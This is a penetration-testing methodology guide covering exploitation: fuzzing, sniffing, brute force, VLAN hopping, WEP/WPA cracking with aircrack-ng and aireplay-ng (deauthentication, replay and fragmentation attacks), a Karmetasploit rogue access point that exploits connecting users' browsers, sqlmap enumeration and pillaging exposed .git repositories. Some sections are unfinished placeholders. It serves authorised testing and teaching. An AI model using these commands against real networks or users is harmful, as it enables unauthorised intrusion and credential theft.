It is known that some older versions of gcc do not use the urandom device in order to create a new cookie. They use a preset cookie value (a mix of unprintable characters such as 00 0A 0D and FF). Gcc will compile an application with stack canaries by default.

MAC OS

Disabled by default. Contribution required.

Customized Exploitation

Fuzzing

Fuzzing is the process of attempting to discover security vulnerabilities by sending random input to an application. If the program contains a vulnerability that leads to an exception, crash, or server error (in the case of web apps), it can be determined that a vulnerability has been discovered. Fuzzers are generally good at finding buffer overflow, DoS, SQL injection, XSS, and format string bugs. Fuzzing falls into two categories: dumb fuzzing and intelligent fuzzing.

Dumb Fuzzing

Dumb fuzzing usually consists of simple modifications to legitimate data, which is then fed to the target application. In this case the fuzzer is very easy to write, and the idea is to identify low-hanging fruit. Although not an elegant approach, dumb fuzzing can produce results, especially when a target application has not been previously tested. FileFuzz is an example of a dumb fuzzer: a Windows-based file format fuzzing tool designed to automate the launching of applications and the detection of exceptions caused by fuzzed file formats.
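The core of a dumb fuzzer fits in a few lines: take a known-good sample, corrupt some bytes at random, and feed the result to the target. The mutation rate and the GIF-like template below are arbitrary choices for illustration.

```python
# Dumb (mutation-based) fuzzing sketch: randomly corrupt bytes of a
# known-good input. Each output keeps the sample's length, with roughly
# `rate` of its bytes replaced by random values.
import random

def dumb_fuzz(sample: bytes, rate: float = 0.05, seed=None) -> bytes:
    rng = random.Random(seed)       # seedable for reproducible test cases
    data = bytearray(sample)
    for i in range(len(data)):
        if rng.random() < rate:
            data[i] = rng.randrange(256)
    return bytes(data)

template = b"GIF89a" + b"\x00" * 64        # valid-looking file header
mutant = dumb_fuzz(template, rate=0.1, seed=1)
print(len(mutant) == len(template))        # True — length is preserved
```

Seeding the generator matters in practice: when a mutant crashes the target, you want to be able to regenerate the exact same input.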

Intelligent Fuzzing

Intelligent Fuzzers are ones that are generally aware of the protocol or format of the data being tested. Some protocols require that the fuzzer maintain state information, such as HTTP or SIP. Other protocols will make use of authentication before a vulnerability is identified. Apart from providing much more code coverage, intelligent fuzzers tend to cut down the fuzzing time significantly since they avoid sending data that the target application will not understand. Intelligent fuzzers are therefore much more targeted and sometimes they need to be developed by the security researcher.

Sniffing

A packet analyzer is used to intercept and log traffic passing over the network. It is considered best practice to utilize a sniffer when performing exploitation. This ensures that all relevant traffic is captured for further analysis. This is also extremely useful for extracting cleartext passwords.

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Screenshot Here

Tcpdump

Tcpdump is a common packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, Mac OS X, HP-UX and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets.

Screenshot Here

Brute-Force

A brute force attack is a strategy that can in theory be used by an attacker who is unable to take advantage of any weakness in a system. It involves systematically checking all possible usernames and passwords until the correct one is found.
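Systematic checking is just exhaustive enumeration, as this sketch shows. The `check` callback stands in for a real authentication attempt; the character set and length cap are arbitrary, and real keyspaces grow exponentially with length.

```python
# Exhaustive password search: try every candidate from a character set,
# shortest first. `check` stands in for the real authentication attempt.
from itertools import product
from string import ascii_lowercase

def brute_force(check, charset=ascii_lowercase, max_len=4):
    for length in range(1, max_len + 1):
        for combo in product(charset, repeat=length):
            guess = "".join(combo)
            if check(guess):
                return guess
    return None

# Simulated target whose password is "abc":
print(brute_force(lambda pw: pw == "abc"))  # abc
```

With 26 lowercase letters, length 4 already means nearly half a million candidates — which is why lockout thresholds, discussed earlier, must be established before attempting this against a live service.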

Brutus (Windows)

Brutus is a generic password guessing tool that comes with built-in routines for attacking services such as POP3. Brutus can perform both dictionary attacks and randomly generated attacks from a given character set.

Web Brute (Windows)

Web Brute is included with HP WebInspect and is the primary means of attacking a login form or authentication page, using prepared lists of user names and passwords.

Ncrack

Ncrack is another network logon bruteforcer which supports attacking many different services such as RDP, SSH, http(s), SMB, pop3(s), FTP, and telnet. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behavior based on network feedback.

Routing protocols

Routing protocols specify how routers communicate with each other, disseminating information that enables them to select routes between any two nodes on a computer network, the choice of the route being done by routing algorithms. Each router has a priori knowledge only of networks attached to it directly. A routing protocol shares this information first among immediate neighbors, and then throughout the network. This way, routers gain knowledge of the topology of the network.

Cisco Discovery Protocol (CDP)

The Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer network protocol developed by Cisco Systems that is implemented in most Cisco networking equipment. It is used to share information about other directly connected Cisco equipment, such as the operating system version and IP address. CDP can also be used for On-Demand Routing, which is a method of including routing information in CDP announcements so that dynamic routing protocols do not need to be used in simple networks.

The information contained in CDP announcements varies by the type of device and the version of the operating system running on it. This information may include the operating system version, hostname, every address (i.e. IP address) from all protocol(s) configured on the port where the CDP frame is sent, the port identifier from which the announcement was sent, device type and model, duplex setting, VTP domain, native VLAN, power draw (for Power over Ethernet devices), and other device-specific information. The details contained in these announcements are easily extended due to the use of the type-length-value (TLV) frame format. The tool for attacking CDP is Yersinia.

Hot Standby Router Protocol (HSRP)

Hot Standby Router Protocol (HSRP) is a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway, and has been described in detail in RFC 2281. The Virtual Router Redundancy Protocol (VRRP) is a standards-based alternative to HSRP defined in IETF standard RFC 3768. The two technologies are similar in concept, but not compatible.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

Screenshot Here

Virtual Switch Redundancy Protocol (VSRP)

The Virtual Switch Redundancy Protocol (VSRP) is a proprietary network resilience protocol developed by Foundry Networks and currently being sold in products manufactured by both Foundry and Hewlett Packard. The protocol differs from many others in use as it combines Layer 2 and Layer 3 resilience – effectively doing the jobs of both Spanning Tree Protocol and the Virtual Router Redundancy Protocol at the same time. Whilst the restrictions on the physical topologies able to make use of VSRP mean that it is less flexible than STP and VRRP, it does significantly improve on the failover times provided by either of those protocols.

Dynamic Trunking Protocol (DTP)

The Dynamic Trunking Protocol (DTP) is a proprietary networking protocol developed by Cisco Systems for the purpose of negotiating trunking on a link between two VLAN-aware switches, and for negotiating the type of trunking encapsulation to be used. It works on the Layer 2 of the OSI model. VLAN trunks formed using DTP may utilize either IEEE 802.1Q or Cisco ISL trunking protocols.

Screenshot Here

Spanning Tree Protocol (STP)

The Spanning Tree Protocol (STP) is a network protocol that ensures a loop-free topology for any bridged Ethernet local area network. The basic function of STP is to prevent bridge loops and ensuing broadcast radiation. Spanning tree also allows a network design to include spare (redundant) links to provide automatic backup paths if an active link fails, without the danger of bridge loops, or the need for manual enabling/disabling of these backup links.

Screenshot Here

Open Shortest Path First (OSPF)

Open Shortest Path First (OSPF) is an adaptive routing protocol for Internet Protocol (IP) networks. It uses a link state routing algorithm and falls into the group of interior routing protocols, operating within a single autonomous system (AS). It is defined as OSPF Version 2 in RFC 2328 (1998) for IPv4. The updates for IPv6 are specified as OSPF Version 3 in RFC 5340 (2008).

RIP

RIP is a dynamic routing protocol used in local and wide area networks. As such it is classified as an interior gateway protocol (IGP). It uses the distance-vector routing algorithm. It was first defined in RFC 1058 (1988). The protocol has since been extended several times, resulting in RIP Version 2 (RFC 2453). Both versions are still in use today, although they are considered to have been made technically obsolete by more advanced techniques such as Open Shortest Path First (OSPF) and the OSI protocol IS-IS. RIP has also been adapted for use in IPv6 networks, a standard known as RIPng (RIP next generation) protocol, published in RFC 2080 (1997).

VLAN Hopping

VLAN hopping (virtual local area network hopping) is a computer security exploit, a method of attacking networked resources on a VLAN. The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging.

In a double tagging attack, an attacking host prepends two VLAN tags to packets that it transmits. The first header (which corresponds to the VLAN that the attacker is really a member of) is stripped off by a first switch the packet encounters, and the packet is then forwarded. The second, false, header is then visible to the second switch that the packet encounters. This false VLAN header indicates that the packet is destined for a host on a second, target VLAN. The packet is then sent to the target host as though it were layer 2 traffic. By this method, the attacking host can bypass layer 3 security measures that are used to logically isolate hosts from one another. The tool for attacking 802.1q is Yersinia.
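The frame layout behind double tagging can be made concrete with a few bytes of packing. The MAC addresses and VLAN IDs below are made-up examples; the fixed constant is the 0x8100 TPID that marks each 802.1Q tag.

```python
# Byte layout of a double-tagged (802.1Q-in-802.1Q) Ethernet frame.
# MAC addresses and VLAN IDs are illustrative; 0x8100 is the 802.1Q TPID.
import struct

def dot1q_tag(vlan_id, priority=0):
    tci = (priority << 13) | (vlan_id & 0x0FFF)   # priority + 12-bit VLAN ID
    return struct.pack("!HH", 0x8100, tci)

dst = bytes.fromhex("ffffffffffff")        # broadcast destination
src = bytes.fromhex("00005e005301")        # attacker's MAC (made up)
frame = (dst + src
         + dot1q_tag(10)                   # outer tag: attacker's own VLAN
         + dot1q_tag(20)                   # inner tag: the target VLAN
         + struct.pack("!H", 0x0800)       # EtherType: IPv4 payload follows
         + b"\x00" * 46)                   # dummy payload

print(frame[12:14].hex())  # 8100 — the first switch strips this outer tag
```

The first switch strips the outer VLAN 10 tag and forwards the frame; the second switch then sees only the inner VLAN 20 tag and delivers the frame onto the target VLAN.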

VLAN Trunking Protocol (VTP)

VLAN Trunking Protocol (VTP) is a Cisco proprietary Layer 2 messaging protocol that manages the addition, deletion, and renaming of Virtual Local Area Networks (VLAN) on a network-wide basis. Cisco’s VLAN Trunk Protocol reduces administration in a switched network. When a new VLAN is configured on one VTP server, the VLAN is distributed through all switches in the domain. This reduces the need to configure the same VLAN everywhere. To do this, VTP carries VLAN information to all the switches in a VTP domain. VTP advertisements can be sent over ISL, 802.1q, IEEE 802.10 and LANE trunks. VTP is available on most of the Cisco Catalyst Family products. The tool for attacking VTP is Yersinia.

RF Access

The goal of the earlier phases is to gather every possible piece of information about the Radio Frequencies in use that can be leveraged during this phase.

Unencrypted Wireless LAN

It is possible to connect directly to an unencrypted wireless LAN (WLAN). To do so, you simply issue the appropriate commands or use a GUI interface to connect.

Iwconfig (Linux)

The following commands connect to the ESSID; the examples below assume the wireless interface is wlan0. To ensure that the wireless interface is down, issue the following:

ifconfig wlan0 down

Force dhclient to release any currently assigned DHCP addresses with the following command:

dhclient -r wlan0

Bring the interface back up with the following command:

ifconfig wlan0 up

Iwconfig is similar to ifconfig, but is dedicated to wireless interfaces. It is used to set the parameters of the network interface that are specific to wireless operation. To set the ESSID (or network name) on the wireless interface, use the following command:

iwconfig wlan0 essid "<client ESSID>"

Next we need to set the operating mode of the device, which depends on the network topology. Setting this to Managed means that we are connecting to a network composed of access points:

iwconfig wlan0 mode Managed

Use dhclient to obtain a DHCP address with the following command:

dhclient wlan0

At this point we should receive an IP address and be connected to the client’s wireless network. Ensure that adequate screen shots are taken to definitively indicate the ability to connect, receive an IP address, and traverse the network.

Windows (XP/7)

Based upon the wireless network adapter installed, Windows will provide you with a mechanism to connect to wireless networks. The version of Windows utilized will dictate the process. For this reason we are covering Windows XP and 7.

Windows XP will show an icon with a notification that says it has found wireless networks.

Right-click the wireless network icon in the lower right corner of your screen, and then click “View Available Wireless Networks.”

The Wireless Network Connection window appears and displays your wireless network listed with the SSID you chose. If you don’t see your network, click Refresh network list in the upper left corner. Click your network, and then click Connect in the lower right corner.

Screenshot Here

Screenshot Here

Screenshot Here

Attacking the Access Point

All identified access points can be subjected to numerous attacks. For completeness, we’ve included some attack methods that may not be a part of all engagements. Ensure that the scoping is reviewed prior to initiating any attacks.

Denial of Service (DoS)

Within the standard, there are two packets that help in this regard, the Clear To Send (CTS) and Request To Send (RTS) packets. Devices use RTS packets when they have something big to send, and they don’t want other devices to step on their transmission. CTS packets are sent so that the device knows it’s okay to transmit. Every device (other than the one that sent the RTS) within the range of the CTS packet cannot transmit anything for the duration specified.

Cracking Passwords

WPA-PSK/ WPA2-PSK

WPA-PSK is vulnerable to brute force attack. Tools like Aircrack and coWPAtty take advantage of this weakness and provide a way to test keys against dictionaries. The problem is that this is a very slow process. Precomputation attacks are limited, as the SSID and the SSID length are seeded into the passphrase hash; this is why WPA-PSK attacks are generally limited by time. There is no difference between cracking WPA and WPA2; the authentication process is essentially the same.
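The seeding works as follows: the Pairwise Master Key is derived from the passphrase with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4096 iterations. The sketch below demonstrates this with the well-known IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), and explains both the slowness (4096 hash iterations per guess) and why precomputed tables only work for one SSID at a time.

```python
# WPA/WPA2-PSK derives the Pairwise Master Key with PBKDF2-HMAC-SHA1,
# using the SSID as the salt — so precomputed tables are per-SSID.
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(),
                               ssid.encode(), 4096, 32)

# IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
print(wpa_pmk("password", "IEEE").hex())
```

Tools like coWPAtty exploit exactly this structure: their precomputed hash files are generated for a specific SSID, which is why tables exist only for the most common network names.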

WPA/WPA2-Enterprise

In environments with a large number of users, such as corporations or universities, WPA/WPA2 pre-shared key management is not feasible. For example, it wouldn’t be possible to track which users are connected and it would be impossible to revoke access to the network for individuals without changing the key for everyone. Therefore WPA2 Enterprise authenticates users against a user database (RADIUS). Two common methods to do that are WPA2-EAP-TTLS and WPA2-PEAP.

Attacks

LEAP

This stands for the Lightweight Extensible Authentication Protocol. This protocol is based on 802.1X and helps minimize the original security flaws by using WEP and a sophisticated key management system. This EAP-version is safer than EAP-MD5. This also uses MAC address authentication. LEAP is not safe against crackers. THC-LeapCracker can be used to break Cisco’s version of LEAP and be used against computers connected to an access point in the form of a dictionary attack. Anwrap and asleap are other crackers capable of breaking LEAP.

Asleap

Asleap is a tool designed specifically to recover weak LEAP (Cisco’s Lightweight Extensible Authentication Protocol) and PPTP passwords. Asleap performs weak LEAP and PPTP password recovery from pcap and AiroPeek files or from a live capture. Finally, it has the ability to deauthenticate clients on a LEAP WLAN (speeding up LEAP password recovery).

The first step involved in the use of asleap is to produce the necessary database (.dat) and index (.idx) files using genkeys, supplying (-r) a dictionary (wordlist) file:

genkeys -r wordlist.txt -f words.dat -n words.idx

The final step in recovering the weak LEAP password is to run the asleap command with our newly created .dat and .idx files:

asleap -r leap.dump -f words.dat -n words.idx

802.1X

802.1X is an IEEE Standard for port-based Network Access Control (PNAC). It is part of the IEEE 802.1 group of networking protocols. It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN.

Key Distribution Attack

The key distribution attack exploits a weakness in the RADIUS protocol. The key distribution attack relies on an attacker capturing the PMK transmission between the RADIUS server and the AP. As the PMK is transmitted outside of the TLS tunnel, its protection is solely reliant on the RADIUS server’s HMAC-MD5 hashing algorithm. Should an attacker be able to leverage a man-in-the-middle attack between the AP and RADIUS server, a brute-force attempt could be made to crack the RADIUS shared secret. This would ultimately provide the attacker with access to the PMK – allowing full decryption of all traffic between the AP and supplicant.

RADIUS Impersonation Attack

The RADIUS impersonation attack relies on users being left with the decision to trust or reject certificates from the authenticator. Attackers can exploit this deployment weakness by impersonating the target network’s AP service set identifier (SSID) and RADIUS server. Once both the RADIUS server and AP have been impersonated the attacker can issue a ‘fake’ certificate to the authenticating user. After the certificate has been accepted by the user the client will proceed to authenticate via the inner authentication mechanism. This allows the attacker to capture the MSCHAPv2 challenge/response and attempt to crack it offline.

PEAP

The Protected Extensible Authentication Protocol (Protected EAP or PEAP) is a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel. The purpose was to correct deficiencies in EAP; EAP assumed a protected communication channel, such as that provided by physical security, so facilities for protection of the EAP conversation were not provided.

RADIUS Impersonation Attack

The RADIUS impersonation attack relies on users being left with the decision to trust or reject certificates from the authenticator. Attackers can exploit this deployment weakness by impersonating the target network’s AP service set identifier (SSID) and RADIUS server. Once both the RADIUS server and AP have been impersonated, the attacker can issue a ‘fake’ certificate to the authenticating user. After the certificate has been accepted by the user, the client will proceed to authenticate via the inner authentication mechanism. This allows the attacker to capture the MSCHAPv2 challenge/response and attempt to crack it offline.

Authentication Attack

The PEAP authentication attack is a primitive means of gaining unauthorized access to PEAP networks. By sniffing usernames from the initial (unprotected) PEAP identity exchange, an attacker can attempt to authenticate to the target network by ‘guessing’ user passwords. This attack is often ineffective, as the authenticator silently ignores bad login attempts and ensures a delay of several seconds exists between login attempts.

EAP-Fast

EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco’s replacement for LEAP. The protocol was designed to address the weaknesses of LEAP while preserving the “lightweight” implementation. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. EAP-FAST provides better protection against dictionary attacks, but is vulnerable to MITM attacks. Since many implementations of EAP-FAST leave anonymous provisioning enabled, AP impersonation can reveal weak credential exchanges.

WEP/WPA/WPA2

The core process of attacking a WEP-encrypted network revolves around recovering the WEP key in order to connect to the network. There are several tools that can be used to perform attacks against WEP.

Aircrack-ng

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations such as the KoreK attacks, as well as the newer PTW attack, making key recovery much faster than with other WEP cracking tools.

Airmon-ng

To start wlan0 in monitor mode:

To start wlan0 in monitor mode on channel 8:

To stop wlan0:

To check the status:
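
The four operations above map onto airmon-ng invocations along these lines (interface names vary by driver; newer airmon-ng releases create a wlan0mon interface rather than mon0):

```shell
airmon-ng start wlan0     # put wlan0 into monitor mode
airmon-ng start wlan0 8   # put wlan0 into monitor mode, locked to channel 8
airmon-ng stop wlan0      # take the interface out of monitor mode
airmon-ng                 # with no arguments, list interfaces and their status
```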

Airodump-ng

Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with Aircrack-ng. If you have a GPS receiver connected to the computer, Airodump-ng is capable of logging the coordinates of the found access points.
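
A typical capture session might look like the following (the BSSID and channel are example values, matching the access point MAC used elsewhere in this section):

```shell
# Capture on channel 8, filter to a single AP, and write the
# collected IVs to files prefixed "capture" for use with aircrack-ng
airodump-ng -c 8 --bssid 34:EF:44:BB:14:C1 -w capture wlan0
```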


Aireplay-ng

These are the attack names and their corresponding “numbers”:

Attack 0: Deauthentication

Attack 1: Fake authentication

Attack 2: Interactive packet replay

Attack 3: ARP request replay attack

Attack 4: KoreK chopchop attack

Attack 5: Fragmentation attack

Attack 9: Injection test

Note: Not all options apply to all attacks.

A deauthentication attack sends disassociation packets to one or more clients who are currently associated with an AP. Disassociating clients can reveal a hidden / cloaked ESSID. Deauthentication attacks also provide an ability to capture WPA/WPA2 handshakes by forcing clients to re-authenticate.

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

-a 34:EF:44:BB:14:C1 is the MAC address of the access point

-c 00:E0:4C:6D:27:8D is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

wlan0 is the interface name
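
Assembled from the options above, the deauthentication command would be:

```shell
# Send one deauthentication frame to the listed client on behalf of the AP
aireplay-ng -0 1 -a 34:EF:44:BB:14:C1 -c 00:E0:4C:6D:27:8D wlan0
```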


The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) and to associate with an AP. This attack is useful in scenarios where there are no associated clients. Note that fake authentication attacks do not generate ARP packets.

-1 means fake authentication

0 is the reassociation timing in seconds

-e 2WIRE696 is the wireless network name

-a 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is our card MAC address

wlan0 is the wireless interface name
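
Assembled from the options above, the fake authentication command would be:

```shell
# Authenticate and associate with the AP as a fake client
aireplay-ng -1 0 -e 2WIRE696 -a 34:EF:44:BB:14:C1 -h 00:E0:4C:6D:27:8D wlan0
```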


The classic ARP request replay attack is the most effective way to generate new initialization vectors, and is probably the most reliable of all. The program listens for an ARP packet and then retransmits it back to the AP. This, in turn, causes the AP to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over; however, each ARP packet repeated by the AP has a new IV. Collecting these IVs will later help us determine the WEP key.

-3 means standard arp request replay

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name
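
Assembled from the options above, the ARP request replay command would be:

```shell
# Listen for an ARP packet and replay it to generate new IVs
aireplay-ng -3 -b 34:EF:44:BB:14:C1 -h 00:E0:4C:6D:27:8D wlan0
```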

Attack 4: KoreK chopchop attack

-4 means the chopchop attack

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name
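
Assembled from the options above, the chopchop command would be:

```shell
# Decrypt a WEP packet one byte at a time without knowing the key
aireplay-ng -4 -b 34:EF:44:BB:14:C1 -h 00:E0:4C:6D:27:8D wlan0
```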

Attack 5: Fragmentation attack

-5 means run the fragmentation attack

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name
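
Assembled from the options above, the fragmentation attack command would be:

```shell
# Obtain keystream material (PRGA) usable for packet forging
aireplay-ng -5 -b 34:EF:44:BB:14:C1 -h 00:E0:4C:6D:27:8D wlan0
```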

Attack 9: Injection test

Where:

-9 means the injection test

wlan0 is the interface name
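
Assembled from the options above, the injection test command would be:

```shell
# Confirm that the card and driver can inject frames
aireplay-ng -9 wlan0
```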


Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the Aircrack-ng suite determines the WEP key using two fundamental methods: the PTW approach (Pyshkin, Tews, and Weinmann) and the older FMS/KoreK approach. The default cracking method is PTW.
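
Continuing the example values used above (capture-01.cap being the first file airodump-ng produces when run with -w capture), the cracking step might look like:

```shell
# Attempt to recover the WEP key for the target BSSID from the captured IVs
aircrack-ng -b 34:EF:44:BB:14:C1 capture-01.cap
```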

Attacking the User

The Rules of Engagement (ROE) should be validated to ensure that attacking users is in scope before conducting any such attacks.

Karmetasploit Attacks

Karmetasploit is a modification of KARMA that integrates it into Metasploit. Karmetasploit creates a working “evil” access point that provides network services to an unsuspecting user. The services Karmetasploit provides include a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, an SMTP service, an FTP service, a couple of different SMB services, and a web service. All DNS lookups result in the IP address of the access point being returned, creating a blackhole effect for all email, web, and other network traffic.

The output of aireplay-ng should indicate that injection is working and that one of the local access points could be reached. If every access point returns 0% and the message indicating injection is working is not there, you likely need to use a different/patched driver or a different wireless card.

Once the DHCP server has been installed, an appropriate configuration file needs to be created. This file is normally called “dhcpd.conf” or “dhcpd3.conf” and resides in /etc, /etc/dhcp, or /etc/dhcp3. The example below uses the 10.0.0.0/24 network with the access point configured at 10.0.0.1.
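
A minimal configuration along these lines would serve the 10.0.0.0/24 network described above (the lease times and address range are illustrative values, not requirements):

```
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
```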

To run Karmetasploit, there are three things that need to happen. First, airbase-ng must be started and configured as a greedy wireless access point: one that beacons the ESSID of the target company, responds to all probe requests, and rebroadcasts all probes as beacons for 30 seconds.

Second, we need to configure the IP address of the at0 interface to match.

Third, the DHCP server needs to be started on the “at0” TUN/TAP interface created by airbase-ng:

Finally, the Metasploit Framework itself needs to be configured. While it’s possible to configure each service by hand, it’s more efficient to use a resource file with the msfconsole interface. A sample resource file, configured to use 10.0.0.1 as the access point address, with nearly every feature enabled, can be downloaded here [2]. To use this resource file, run msfconsole with the -r parameter. Keep in mind that msfconsole must be run as root for the capture services to function.
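
Under those assumptions (target ESSID "TargetCorp", resource file karma.rc, and DHCP configuration at /etc/dhcp3/dhcpd.conf, all placeholder names), the full startup sequence might look like:

```shell
# 1. Greedy AP: beacon the target ESSID, answer all probes (-P),
#    and rebroadcast probed ESSIDs as beacons for 30 seconds (-C 30)
airbase-ng -P -C 30 -e "TargetCorp" -v wlan0

# 2. Give the at0 interface the AP address used in dhcpd.conf
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

# 3. Start the DHCP server on the at0 TUN/TAP interface
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

# 4. Launch Metasploit with the Karmetasploit resource file (as root)
msfconsole -r karma.rc
```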

Once the Metasploit Framework processes the commands in the resource file, the standard msfconsole shell will be available for commands. As clients connect to the access point and try to access the network, the service modules will do what they can to extract information from the client and exploit browser vulnerabilities.

DNS Requests

<Contribution Needed>

Bluetooth

<Contribution Needed>

Personalized Rogue AP

<Contribution Needed>

DoS / Blackmail angle

Web

A web application involves a web server that accepts input and is most often interfaced with over HTTP(S). The penetration tester’s goal is to discover any interaction points that can be manipulated to access information, functionality, or services beyond the web application’s intended use. Quite often a web application will comprise several tiers, generally broken up into web, application, and data. These tiers can run on one or more servers, and any of the tiers may be load balanced across multiple servers.

In the quest to find all the entry points during the intelligence gathering and vulnerability analysis phases, the penetration tester will mostly use GET and POST requests, but should also test HEAD, PUT, DELETE, TRACE, OPTIONS, CONNECT, and PATCH. The objective is to map all input and output points. These are not limited to simply forms on a page, but include cookies, links, hidden forms, HTTP parameters, etc. During this exploration, particular attention should be given to sessions, cookies, error pages, HTTP status codes, indirectly accessible pages, encryption usage, server configuration, and DNS and proxy cache usage. Ideally, this will be done using both automated and manual methods to discover potential ways to manipulate the web application’s parameters or logic. This is generally done using some form of client application (browser), a proxy that can sit between the client application and the web application, and a tool to crawl (aka spider) through page links.
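
As a quick illustration, curl can be used to check which HTTP methods a server claims to accept for a resource (example.com stands in for the target):

```shell
# Ask the server which methods it advertises for this resource
curl -s -i -X OPTIONS http://example.com/ | grep -i '^allow:'

# Probe a specific method directly and observe only the status code
curl -s -o /dev/null -w '%{http_code}\n' -X TRACE http://example.com/
```

Note that the Allow header is advisory; servers sometimes accept methods they do not advertise, so each method is worth probing directly.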

SQL Injection (SQLi)

According to OWASP (https://www.owasp.org/index.php/SQL_Injection), SQL Injection, more commonly known as SQLi, consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown of the DBMS), recover the content of a given file present on the DBMS file system, and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

What is injection? Simply stated, SQL injection exploits a vulnerability that allows data sent to an application to be interpreted and run as SQL commands.

SQL injection is typically discovered in the vulnerability analysis phase of the engagement (and may be hinted at during the intelligence gathering phase).

Several tools are available for the identification and exploitation of SQLi:

Havij (http://itsecteam.com/en/projects/project1.htm)

SQLmap (http://sqlmap.sourceforge.net)

The Mole (http://sourceforge.net/projects/themole)

Pangolin (http://nosec.org/en/productservice/pangolin)
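
For example, sqlmap can test a GET parameter and enumerate the reachable databases (the URL and parameter below are placeholders, not a real target):

```shell
# Test the "id" parameter for SQL injection and, if injectable,
# list the databases visible to the application's DB account
sqlmap -u "http://example.com/item.php?id=1" --batch --dbs
```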

XSS

<Contribution Needed>

CSRF

<Contribution Needed>

Ad-Hoc Networks

<Contribution Needed>

Information Leakage

Detection bypass

<Contribution Needed>

FW/WAF/IDS/IPS Evasion

Human Evasion

DLP Evasion

Resistance of Controls to attacks

<Contribution Needed>

Type of Attack

<Contribution Needed>

Client Side

Phishing (w/pretext)

Service Side

Out of band

Post-Exploitation

Infrastructure analysis

The Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) is a Python-driven suite of custom tools which focuses solely on attacking the human element of pentesting. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack. The first utilizes Metasploit payloads and Java-based attacks by setting up a malicious website (a clone of any site you choose) that ultimately delivers your payload. The second works through file-format bugs and e-mail phishing, and supports your own open-mail relay, a customized sendmail open relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social engineering. You can see detailed tutorials here or by downloading the user manual here.

High Value Files

Database Enumeration

Wifi

Add new Wi-Fi entries with a higher preference, then set up an AP to force a connection

Check ESSIDs to identify places visited

Source Code Repos

<Contribution Needed>

SVN

CVS

MS Sourcesafe

WebDAV

Git

Git is a distributed version control system (DVCS); its metadata directory (.git) contains all the information necessary to re-create the state of the repository at any given point in time.

Identify the repo

Note: the .git directory is not always present in the root; depending on how part of the application is deployed it may live in a subdirectory, e.g. http://example.com/blog/.git/
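
One way to check for an exposed repository is to request well-known files inside .git directly, then attempt a clone (example.com is a placeholder for the target):

```shell
# An exposed repo usually serves its HEAD file as plain text,
# typically a line such as "ref: refs/heads/master"
curl -s http://example.com/.git/HEAD

# Try to clone; this only succeeds if the server supports git's
# dumb HTTP protocol or allows directory listing of .git/objects
git clone http://example.com/.git/ looted-repo
```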

If the clone attempt results in an error, you will have to resort to pillaging in other ways, as the repo is not easily cloneable.

Check for directory browsing

Example:

Other useful data

.git/index

“The index is a binary file (generally kept in .git/index) containing a sorted list of path names, each with permissions and the SHA1 of a blob object; git ls-files can show you the contents of the index:” (http://book.git-scm.com/7_the_git_index.html)